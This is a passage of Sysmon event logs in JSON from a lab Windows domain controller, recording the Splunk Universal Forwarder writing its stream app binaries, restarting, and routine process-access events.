Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\msvcp140.dll","CreationUtcTime":"2020-08-01 06:51:43.502","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":3171,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:43.502\r\nProcessGuid: {E2A3D6B1-106B-5F25-0000-0010C1C00200}\r\nProcessId: 2792\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetFilename: C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\npf.sys\r\nCreationUtcTime: 2020-08-01 06:51:43.502","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:51:43.502","ProcessGuid":"{E2A3D6B1-106B-5F25-0000-0010C1C00200}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetFilename":"C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\npf.sys","CreationUtcTime":"2020-08-01 06:51:43.502","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":3172,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:51:43.502\r\nProcessGuid: {E2A3D6B1-106B-5F25-0000-0010C1C00200}\r\nProcessId: 2792\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetFilename: C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\qmflow.dll\r\nCreationUtcTime: 2020-08-01 06:51:43.502","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:51:43.502","ProcessGuid":"{E2A3D6B1-106B-5F25-0000-0010C1C00200}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetFilename":"C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\qmflow.dll","CreationUtcTime":"2020-08-01 06:51:43.502","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":3173,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:51:43.502\r\nProcessGuid: {E2A3D6B1-106B-5F25-0000-0010C1C00200}\r\nProcessId: 2792\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetFilename: C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\qmframework.dll\r\nCreationUtcTime: 2020-08-01 06:51:43.502","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:51:43.502","ProcessGuid":"{E2A3D6B1-106B-5F25-0000-0010C1C00200}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetFilename":"C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\qmframework.dll","CreationUtcTime":"2020-08-01 06:51:43.502","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":3174,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:51:43.518\r\nProcessGuid: {E2A3D6B1-106B-5F25-0000-0010C1C00200}\r\nProcessId: 2792\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetFilename: C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\qmprotocols.dll\r\nCreationUtcTime: 2020-08-01 06:51:43.518","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:51:43.518","ProcessGuid":"{E2A3D6B1-106B-5F25-0000-0010C1C00200}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetFilename":"C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\qmprotocols.dll","CreationUtcTime":"2020-08-01 06:51:43.518","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":3175,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: EXE\r\nUtcTime: 2020-08-01 06:51:43.533\r\nProcessGuid: {E2A3D6B1-106B-5F25-0000-0010C1C00200}\r\nProcessId: 2792\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetFilename: C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\streamfwd.exe\r\nCreationUtcTime: 2020-08-01 06:51:43.533","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"EXE","UtcTime":"2020-08-01 06:51:43.533","ProcessGuid":"{E2A3D6B1-106B-5F25-0000-0010C1C00200}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetFilename":"C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\streamfwd.exe","CreationUtcTime":"2020-08-01 06:51:43.533","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":3176,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:51:43.627\r\nProcessGuid: {E2A3D6B1-106B-5F25-0000-0010C1C00200}\r\nProcessId: 2792\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetFilename: C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\vccorlib140.dll\r\nCreationUtcTime: 2020-08-01 06:51:43.627","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:51:43.627","ProcessGuid":"{E2A3D6B1-106B-5F25-0000-0010C1C00200}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetFilename":"C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\vccorlib140.dll","CreationUtcTime":"2020-08-01 06:51:43.627","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":3177,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:51:43.627\r\nProcessGuid: {E2A3D6B1-106B-5F25-0000-0010C1C00200}\r\nProcessId: 2792\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetFilename: C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\vcruntime140.dll\r\nCreationUtcTime: 2020-08-01 06:51:43.627","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:51:43.627","ProcessGuid":"{E2A3D6B1-106B-5F25-0000-0010C1C00200}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetFilename":"C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\vcruntime140.dll","CreationUtcTime":"2020-08-01 06:51:43.627","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":3178,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:51:43.627\r\nProcessGuid: {E2A3D6B1-106B-5F25-0000-0010C1C00200}\r\nProcessId: 2792\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetFilename: C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\wpcap.dll\r\nCreationUtcTime: 2020-08-01 06:51:43.627","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:51:43.627","ProcessGuid":"{E2A3D6B1-106B-5F25-0000-0010C1C00200}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetFilename":"C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\wpcap.dll","CreationUtcTime":"2020-08-01 06:51:43.627","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3179,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:43.676\r\nProcessGuid: {E2A3D6B1-10FF-5F25-0000-001016560500}\r\nProcessId: 5004\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nFileVersion: 8.0.2\r\nDescription: splunk Application\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk.exe\r\nCommandLine: splunk _relaunch restart --accept-license --answer-yes --no-prompt --waitonpid=2792\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3\r\nParentProcessGuid: {E2A3D6B1-106B-5F25-0000-0010C1C00200}\r\nParentProcessId: 2792\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:51:43.676","ProcessGuid":"{E2A3D6B1-10FF-5F25-0000-001016560500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","FileVersion":"8.0.2","Description":"splunk Application","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk.exe","CommandLine":"splunk _relaunch restart --accept-license --answer-yes --no-prompt --waitonpid=2792","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3","ParentProcessGuid":"{E2A3D6B1-106B-5F25-0000-0010C1C00200}","ParentProcessId":"2792","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3180,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:43.674\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-0010C1C00200}\r\nSourceProcessId: 2792\r\nSourceThreadId: 4080\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-10FF-5F25-0000-001016560500}\r\nTargetProcessId: 5004\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+77c1aa|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+b08def|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+dd792a|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+dd534e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+1a2a848|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:43.674","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-0010C1C00200}","SourceProcessId":"2792","SourceThreadId":"4080","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-10FF-5F25-0000-001016560500}","TargetProcessId":"5004","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+77c1aa|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+b08def|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+dd792a|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+dd534e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+1a2a848|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3181,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:43.674\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-10FF-5F25-0000-001016560500}\r\nTargetProcessId: 5004\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:43.674","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-10FF-5F25-0000-001016560500}","TargetProcessId":"5004","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3182,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:43.674\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:43.674","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3183,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:43.674\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:43.674","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
